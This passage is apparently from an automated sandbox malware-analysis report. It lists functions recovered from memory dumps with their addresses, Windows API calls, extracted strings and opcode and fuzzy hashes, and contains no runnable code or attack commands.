                                                                      • Instruction Fuzzy Hash: 9332C171F00215AFDB04DBB9C880B9EB7F6EF89204F268569D505EB391DB34EC418BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C99EFCD, Relevance: .6, Instructions: 617COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c4f44d06e9f91f705080e6f987fa75bba9d315d28d38f136b2de39472b63e9d4
                                                                      • Instruction ID: 1c58d8f4a8352b083390f2961900c327300e70b5f1f36eff75f898b807c79732
                                                                      • Opcode Fuzzy Hash: c4f44d06e9f91f705080e6f987fa75bba9d315d28d38f136b2de39472b63e9d4
                                                                      • Instruction Fuzzy Hash: F132E030E042488FEB55DBA5C84479EB7B6EF85304F25C1ADD10AAF296DB349C85CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B8478, Relevance: .4, Instructions: 402COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 456febfd20c69dc5107e7e75626de7ce350ab634b86e1ca70ba547958b6c4fd0
                                                                      • Instruction ID: 1bbbccc5bc3a73ab8e249c9e58f7a964a1f31f56762f3846a55ad2769437992a
                                                                      • Opcode Fuzzy Hash: 456febfd20c69dc5107e7e75626de7ce350ab634b86e1ca70ba547958b6c4fd0
                                                                      • Instruction Fuzzy Hash: 79F18034F012159FCB00DBB8C584B9EB7B2AF88314F258228D915AF395DB35EC46CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA45E08, Relevance: .3, Instructions: 315COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cab2e6be1485468085b68f90fac899c37d971698d79549f0f361630ab33f7a6c
                                                                      • Instruction ID: f2fd5dc0ad6405b7e7bc45b4b163efca112d0eaa0bf7ece4a50c502343c2a656
                                                                      • Opcode Fuzzy Hash: cab2e6be1485468085b68f90fac899c37d971698d79549f0f361630ab33f7a6c
                                                                      • Instruction Fuzzy Hash: E912B0F0401B668AE710DF65C8E83867BB1F76039CB664209CE672B2D5D7BA118BCF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA44ACC, Relevance: .3, Instructions: 253COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 88dc83503427805b22905dada649116973d599916f5d8c5478b20d406af16a84
                                                                      • Instruction ID: e34fb004384c9ba43b7c2ec03dd6164cf3a73cdeee46f9bd677d28cca26c73ca
                                                                      • Opcode Fuzzy Hash: 88dc83503427805b22905dada649116973d599916f5d8c5478b20d406af16a84
                                                                      • Instruction Fuzzy Hash: 8EA16E39E00719DFCB04DFA4C8909DEB7BABF89314F29C615E816AB360DB70A845CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA45DC1, Relevance: .2, Instructions: 248COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5b1098a69c9904fec695c4e942723ff2a1857230c5ba2c0137f666ec4b962954
                                                                      • Instruction ID: a8019904ce949d5748d47a67b4199dbf644793993f5b354520c2c6d3a9abd1a4
                                                                      • Opcode Fuzzy Hash: 5b1098a69c9904fec695c4e942723ff2a1857230c5ba2c0137f666ec4b962954
                                                                      • Instruction Fuzzy Hash: 67C139B0400B698BD710DF25C8E828A7BB1FB6539CF264319DD636B2D1D7BA118ACF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA46AF1, Relevance: .2, Instructions: 228COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 806171b023ea90f72a4ad2e9054a87ad18fec6e5f74f88e2daac3e556a9ddae3
                                                                      • Instruction ID: 6e9eaf15bf0e7bf02e58234ebecb076cde56c316b82364cdd7d2371425d77a12
                                                                      • Opcode Fuzzy Hash: 806171b023ea90f72a4ad2e9054a87ad18fec6e5f74f88e2daac3e556a9ddae3
                                                                      • Instruction Fuzzy Hash: 8F917E39E00719DFCB00CFA0D9909DEB7BAFF89314F298615E916AB360DB30A945CB51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9BBE88, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 172libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LRk$LRk
                                                                      • API String ID: 2994545307-3442965990
                                                                      • Opcode ID: 432a7625932f996f62da19dea42e6b4e99b7f1cd17a91094e352183c534e3b17
                                                                      • Instruction ID: 057655b6200dba63f68b72fb0b96d2c8f115a3d64c59f628cd21fbfc23ff4c73
                                                                      • Opcode Fuzzy Hash: 432a7625932f996f62da19dea42e6b4e99b7f1cd17a91094e352183c534e3b17
                                                                      • Instruction Fuzzy Hash: E151B471B053099FCB04DBB4C899A9E7BF5BF85200F14896AE506DB391EF71E809CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA44A08, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DA4690A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID: {|^${|^
                                                                      • API String ID: 716092398-4267019200
                                                                      • Opcode ID: 3bc8ee59f21e9e207b9a7b6c6c1181ee10f12618f0ec23bc7eb26c46cf3bf055
                                                                      • Instruction ID: 56faf586396caad372d449a17f73de1858ce9ed00073a85ab352bb1a3f5e0950
                                                                      • Opcode Fuzzy Hash: 3bc8ee59f21e9e207b9a7b6c6c1181ee10f12618f0ec23bc7eb26c46cf3bf055
                                                                      • Instruction Fuzzy Hash: F3514A71C09348DFCB01CFAAD8906DEBFB1BF89314F29816AE414AB252D7749948CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9BBEE8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: LRk$LRk
                                                                      • API String ID: 2994545307-3442965990
                                                                      • Opcode ID: 6b2ab3115882bc8964c2f3b2018c82f0e70a3008d2ac4912ffab23e40ae6337a
                                                                      • Instruction ID: c8861d0c06c8e5e2ff53365c2ad8a795cc59c396dece5b727601b238b0b42935
                                                                      • Opcode Fuzzy Hash: 6b2ab3115882bc8964c2f3b2018c82f0e70a3008d2ac4912ffab23e40ae6337a
                                                                      • Instruction Fuzzy Hash: 90518675B002199FCB04EFB4C489A9EB7F6BF85204F14896DE5069B391DF71E809CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA467ED, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DA4690A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID: {|^${|^
                                                                      • API String ID: 716092398-4267019200
                                                                      • Opcode ID: bf24f3928c630d42bc75fa220a2a97a45be06d8c86d923e6e1c8f1884b2a9b09
                                                                      • Instruction ID: 874126cb3b9cc258b3417bd0f28cc6a9bbb0b75eb0e476212637dc5c3364ee70
                                                                      • Opcode Fuzzy Hash: bf24f3928c630d42bc75fa220a2a97a45be06d8c86d923e6e1c8f1884b2a9b09
                                                                      • Instruction Fuzzy Hash: 4551BFB1D00349DFDF14CFAAD880ADEBBB5BF88310F28812AE419AB211D7759945CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA44A7C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DA4690A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateWindow
                                                                      • String ID: {|^${|^
                                                                      • API String ID: 716092398-4267019200
                                                                      • Opcode ID: 722fc411f0f14faaee3626e2cb4b01be58d7d8e27a2c30e4124cd2f8cbb9391f
                                                                      • Instruction ID: 69eb3797c3809455a9eef1f3495364c9fa5bd757443d55dcc89981191bd694f0
                                                                      • Opcode Fuzzy Hash: 722fc411f0f14faaee3626e2cb4b01be58d7d8e27a2c30e4124cd2f8cbb9391f
                                                                      • Instruction Fuzzy Hash: 2A51AFB1D00349DFDB14CFAAC884ADEBBB5FF48310F24812AE819AB211D775A945CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C999120, Relevance: 4.0, Strings: 3, Instructions: 212COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0oIj$DqIj$PHk
                                                                      • API String ID: 0-327931892
                                                                      • Opcode ID: d2618ec230dd5acfa0ce5ba84e1b1b08bf7f409986b9ce937657b763a9530901
                                                                      • Instruction ID: 1a18256626a5000becddbf10ff7ac96ddcbcd0c8cfa25b062e3d766dfcfbe78b
                                                                      • Opcode Fuzzy Hash: d2618ec230dd5acfa0ce5ba84e1b1b08bf7f409986b9ce937657b763a9530901
                                                                      • Instruction Fuzzy Hash: E5818934B101058FCB44DF78D489A9DBBF6EF89214B1684A9E90ADB7B1DB31EC05CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9990C0, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0oIj$DqIj$PHk
                                                                      • API String ID: 0-327931892
                                                                      • Opcode ID: 07f5fdd16109a98323ad8baba654202224608136f21e6d78f78d3c09da1d77e5
                                                                      • Instruction ID: e2e398ec74d0141d9328653643ee5ef7525337814a79ea7ae9371425a6f5597b
                                                                      • Opcode Fuzzy Hash: 07f5fdd16109a98323ad8baba654202224608136f21e6d78f78d3c09da1d77e5
                                                                      • Instruction Fuzzy Hash: 3C818C347142558FC704DF78D498A5DBBF6AF8A314B1684A9E50ACB3B2EB31EC05CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B7A29, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 118registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 1C9B7B3C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID: {|^
                                                                      • API String ID: 71445658-4251809065
                                                                      • Opcode ID: a8f097f678c32931d301316311264206b75827687b71b0318de52bdf67dcafee
                                                                      • Instruction ID: 9b4926259ed8c0964c6812bc5c7f43aa9936d2656f4fff4d29737c53c826e804
                                                                      • Opcode Fuzzy Hash: a8f097f678c32931d301316311264206b75827687b71b0318de52bdf67dcafee
                                                                      • Instruction Fuzzy Hash: 584144B0E052499FDB00CFA9C544B8EFBF5FF49304F29826AD408AB352C7759946CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA4A144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DA4B4D9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CallProcWindow
                                                                      • String ID: {|^
                                                                      • API String ID: 2714655100-4251809065
                                                                      • Opcode ID: 4730c3d7a6550dffbaa28813c7ffe8f990b9b29f1fab11e030203a5657855554
                                                                      • Instruction ID: db2e7d275e79d3ccaa11f56d7d55686a4fa0cdc6e89b7120190a138f0063249e
                                                                      • Opcode Fuzzy Hash: 4730c3d7a6550dffbaa28813c7ffe8f990b9b29f1fab11e030203a5657855554
                                                                      • Instruction Fuzzy Hash: 6D4125B89003498FCB14CF99C484AAAFBF5FF88314F29C459D519AB321C775A841CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B7CE5, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1C9B7DA9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID: {|^
                                                                      • API String ID: 3660427363-4251809065
                                                                      • Opcode ID: d800621b28327c9664cc478a298308fd8a84b4eab4e92dc2385eefa43ec9dd54
                                                                      • Instruction ID: 03bb28c4279bc7e1badd8c4a1f9b8bdb52f6cd53e52836335f5a08363700a7b3
                                                                      • Opcode Fuzzy Hash: d800621b28327c9664cc478a298308fd8a84b4eab4e92dc2385eefa43ec9dd54
                                                                      • Instruction Fuzzy Hash: 8431C0B1D11258DBCB10CFA9C580A9EBBF5AF48740F25852AE859BB310D7319905CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B5598, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 88registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 1C9B7DA9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID: {|^
                                                                      • API String ID: 3660427363-4251809065
                                                                      • Opcode ID: bbcce1dc3d5aeaa88dedc3e57c7168d73eb90d4e25da1977aea957b8ef0d669f
                                                                      • Instruction ID: 9f205d1c2b65bfc8ad6dc9b76fe4002e13c2a27f9661dce3ee2b2db28c7c6375
                                                                      • Opcode Fuzzy Hash: bbcce1dc3d5aeaa88dedc3e57c7168d73eb90d4e25da1977aea957b8ef0d669f
                                                                      • Instruction Fuzzy Hash: 0A31CFB1D01258AFCB10CF99C984A9EBBF5AF88750F15852EE819BB310D770A905CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C9B558C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 1C9B7B3C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506711512.000000001C9B0000.00000040.00000001.sdmp, Offset: 1C9B0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID: {|^
                                                                      • API String ID: 71445658-4251809065
                                                                      • Opcode ID: 2747d5ce4a966450576472569ada1a5ba3909d91ec4f8dd2ad039c63e75ceec8
                                                                      • Instruction ID: 29b870b8fac664bcddc18f0f8a1db02f3aaa9d26e4827ec0e9983ac772599489
                                                                      • Opcode Fuzzy Hash: 2747d5ce4a966450576472569ada1a5ba3909d91ec4f8dd2ad039c63e75ceec8
                                                                      • Instruction Fuzzy Hash: 1731EEB0D052599FDB00CFA9C584B8EFBF5BF48304F29826EE809AB251C7759945CFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA4A54A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DA4A5D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID: {|^
                                                                      • API String ID: 3793708945-4251809065
                                                                      • Opcode ID: 72c8b3ecb14d8a0eeddb8137e9470eee534e3a0b83191e9fa214ff51752cf3b3
                                                                      • Instruction ID: 3a152e1c98675475db63377b682700eea11d4302cb83e946e9d36fa5f57a362a
                                                                      • Opcode Fuzzy Hash: 72c8b3ecb14d8a0eeddb8137e9470eee534e3a0b83191e9fa214ff51752cf3b3
                                                                      • Instruction Fuzzy Hash: F121E4B5900258DFDB00CFAAD984AEEFBF4FB48310F14841AE959A3310C374AA54CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA4A550, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DA4A5D7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID: {|^
                                                                      • API String ID: 3793708945-4251809065
                                                                      • Opcode ID: 5ea4608a5d5787a78a1572d06b0a92f1dc042da2089fa7c206720ba057e2ef6e
                                                                      • Instruction ID: 5a82dcdf053c346739e8766811a07b72dc239c00fd90aa5570c46edbc060e051
                                                                      • Opcode Fuzzy Hash: 5ea4608a5d5787a78a1572d06b0a92f1dc042da2089fa7c206720ba057e2ef6e
                                                                      • Instruction Fuzzy Hash: D121E4B5900248DFDB00CFAAD984AEEFBF4FB48310F14841AE955A3310C374A954CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A41544, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00A42791,00000800), ref: 00A42822
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497025472.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID: {|^
                                                                      • API String ID: 1029625771-4251809065
                                                                      • Opcode ID: 3473bfd5936ca740259118dfdebe4e0a574119f23ffac46d265b47228e174724
                                                                      • Instruction ID: 3a7a2cb1f9dedf385714918491785baa2b5d5abaae663e850ad9efa2eb340c3a
                                                                      • Opcode Fuzzy Hash: 3473bfd5936ca740259118dfdebe4e0a574119f23ffac46d265b47228e174724
                                                                      • Instruction Fuzzy Hash: 961112B6D002498FCB10CFAAD444BEEFBF4EB88314F10842AE959A7200C375A945CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A427B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,00A42791,00000800), ref: 00A42822
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497025472.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID: {|^
                                                                      • API String ID: 1029625771-4251809065
                                                                      • Opcode ID: 71790d4a833427669eca80cb92c96217b75b1e1cf2d320f044fdb6dd7003c5d4
                                                                      • Instruction ID: 3f290729a9eeb5876c4f4be710afc80206710bf52e084aa6e8d80e6b394d897c
                                                                      • Opcode Fuzzy Hash: 71790d4a833427669eca80cb92c96217b75b1e1cf2d320f044fdb6dd7003c5d4
                                                                      • Instruction Fuzzy Hash: BD1100B6D002498FDB14CFAAC584BDEFBF4EB88310F14842AE919A7610C379A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA45749, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1DA457B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID: {|^
                                                                      • API String ID: 4139908857-4251809065
                                                                      • Opcode ID: 37e4de929179d3a73b7c36d091be578b628eb0dac54161aec70419fa4735ce48
                                                                      • Instruction ID: b2141c01b1eb0c8e9d202d8e8680630b22f47ed88edb51489ae91d446accffdb
                                                                      • Opcode Fuzzy Hash: 37e4de929179d3a73b7c36d091be578b628eb0dac54161aec70419fa4735ce48
                                                                      • Instruction Fuzzy Hash: 5D1123B9C002498EDB10CF9AD440ADEFBF8EB49320F10C42AD459A3600C375A545CFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1DA437C8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 1DA457B6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34508401062.000000001DA40000.00000040.00000001.sdmp, Offset: 1DA40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: HandleModule
                                                                      • String ID: {|^
                                                                      • API String ID: 4139908857-4251809065
                                                                      • Opcode ID: e2e88f8fd216befff46e5ba7c22867f398d086a78326e6936bd2747786a40b29
                                                                      • Instruction ID: dc942e22f48fd36548c4cfa8634afee4858ae4e0ae5be3284b065ab312a14e60
                                                                      • Opcode Fuzzy Hash: e2e88f8fd216befff46e5ba7c22867f398d086a78326e6936bd2747786a40b29
                                                                      • Instruction Fuzzy Hash: 121120B5C04649CFCB10CFAAC444B9EFBF8EB89210F14C42AD959B7600C379A505CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A458E8, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 00A467C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497025472.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: {|^
                                                                      • API String ID: 2538663250-4251809065
                                                                      • Opcode ID: 1f913d3faa33f54829552c5193ca5feff0004ec55e38d71c8a4c9aa7c6914b98
                                                                      • Instruction ID: fc73a0f6146714c507bbc322c6120cb53f7882059f61131702caf1097cb8575f
                                                                      • Opcode Fuzzy Hash: 1f913d3faa33f54829552c5193ca5feff0004ec55e38d71c8a4c9aa7c6914b98
                                                                      • Instruction Fuzzy Hash: F11115B5904248CFCB10CFA9C484BDEFBF4EB89314F10885AD558A7710C374A944CFA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A46769, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 00A467C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497025472.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: {|^
                                                                      • API String ID: 2538663250-4251809065
                                                                      • Opcode ID: 8f243426803a27bfcd0e4f8a0e8e0befd105b05eec22d1fcc8aceccc60e8e4ff
                                                                      • Instruction ID: 2f523441d1a2eaff8bd8f5609553e4c9456fcd5bd443d7cc86ac3d9483536d9e
                                                                      • Opcode Fuzzy Hash: 8f243426803a27bfcd0e4f8a0e8e0befd105b05eec22d1fcc8aceccc60e8e4ff
                                                                      • Instruction Fuzzy Hash: D01115B59042598FCB10CFA9C484BDEFBF4EF49314F148869D558A7651C374AA44CFA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 1C99F830, Relevance: 3.1, Strings: 2, Instructions: 555COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34506440224.000000001C990000.00000040.00000001.sdmp, Offset: 1C990000, based on PE: false
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'k$4'k
                                                                      • API String ID: 0-1198179576
                                                                      • Opcode ID: 1be435eee6176852cb1eef1e8e0fb4d7c80f63e2aed8de6212f60a09315fa303
                                                                      • Instruction ID: 468e0ecb1dcf3028bce48251d6a5baf87eb87e843987504b27e651cac1b4bda1
                                                                      • Opcode Fuzzy Hash: 1be435eee6176852cb1eef1e8e0fb4d7c80f63e2aed8de6212f60a09315fa303
                                                                      • Instruction Fuzzy Hash: 0812A030B046458FEB06CB6AC45076DF7AAAF86304F21856EE905DF3A1EB75DC81CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A86971, Relevance: 2.1, APIs: 1, Instructions: 631libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: edd87456c1dd39c4c3e4e357b5dfa9132a59c1b82e726d437d57cf315d2abe85
                                                                      • Instruction ID: f3199d40a56b2d4401321ef6d1315ac6c6f21c02766845a02abb1d0a415d7281
                                                                      • Opcode Fuzzy Hash: edd87456c1dd39c4c3e4e357b5dfa9132a59c1b82e726d437d57cf315d2abe85
                                                                      • Instruction Fuzzy Hash: 926206B4945228CFCB64EF74C88869DBBB6BF48305F2041EAD90AA3754DB359E85CF50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00A869B8, Relevance: 2.1, APIs: 1, Instructions: 624libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.34497162852.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 85129cfefd68ab52a04d6664b0660a4dc249b2c539b248dcb98e46438fdb9f26
                                                                      • Instruction ID: 80a698fd046d6c106ad7f27c180c3a3f80ae612aefc45213020688dd97b50962
                                                                      • Opcode Fuzzy Hash: 85129cfefd68ab52a04d6664b0660a4dc249b2c539b248dcb98e46438fdb9f26
